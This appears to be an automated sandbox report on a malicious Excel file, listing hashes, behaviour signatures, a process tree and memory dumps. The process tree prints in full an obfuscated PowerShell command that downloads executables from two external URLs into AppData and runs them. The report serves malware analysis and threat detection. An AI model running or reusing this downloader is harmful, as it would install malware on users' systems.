Analysis

  • max time kernel
    24s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22-07-2024 22:25

General

  • Target

    99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls

  • Size

    52KB

  • MD5

    86f2a9879de336b1c983755b2615f926

  • SHA1

    19250c71f3eb28a6b4e3febef6dfa47a30e3342e

  • SHA256

    99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4

  • SHA512

    d37da87e8a2e65b17f138540283e005b68016c7a2688889f621858b06cf1362cab8d21a91a4e99c47b87ec996e31c1813a389f45418eee45f91620800e987bcc

  • SSDEEP

    1536:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdg6boobYGF7:0fxEtjPOtioVjDGUU1qfDlaGGx+cMdgw

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\99ee3de5b1ff1665708ca47338eeb389824cc07af1273abe31c7b7a05facfee4.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\SysWOW64\CMd.exe
      CMd.exe /c "p^ow^Ers^hel^l^.e^xe^ -nO^l -No^Ni^Nt^ -W^IndOws^ 1 -NoprOFIle^ -ex^Ec^u B^Ypa^S^s -Wi^ 1 -N^O^Pr^ $random = N^ew-^O^b^je^ct^ Sy^st^em.^Ran^do^m; Fo^rea^ch($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { t^ry { $fg = $ra^n^do^m.n^e^xt(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; ^(^ne^w-^ob^jec^t s^ys^t^e^m.ne^t^.webcli^en^t)^.D^ow^nl^o^ad^Fi^le($um.ToString(), $pp); St^a^rt-^Pr^oce^ss $pp; b^re^ak; } c^at^ch { Wr^it^e-Ho^st $err^or[0].E^x^cep^ti^on } }"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://cizijazykyhrou.cz/ama.exe},{http://biwebdisseny.com/eco.exe})) { try { $fg = $random.next(0, 61132); $pp = 'C:\Users\Admin\AppData\Roaming\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2216-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2216-1-0x0000000071D5D000-0x0000000071D68000-memory.dmp

    Filesize

    44KB

  • memory/2216-366-0x0000000006270000-0x0000000006370000-memory.dmp

    Filesize

    1024KB

  • memory/2216-263-0x0000000006270000-0x0000000006370000-memory.dmp

    Filesize

    1024KB

  • memory/2216-164-0x0000000006270000-0x0000000006370000-memory.dmp

    Filesize

    1024KB

  • memory/2216-455-0x0000000006270000-0x0000000006370000-memory.dmp

    Filesize

    1024KB

  • memory/2216-563-0x0000000071D5D000-0x0000000071D68000-memory.dmp

    Filesize

    44KB

  • memory/2216-564-0x0000000006270000-0x0000000006370000-memory.dmp

    Filesize

    1024KB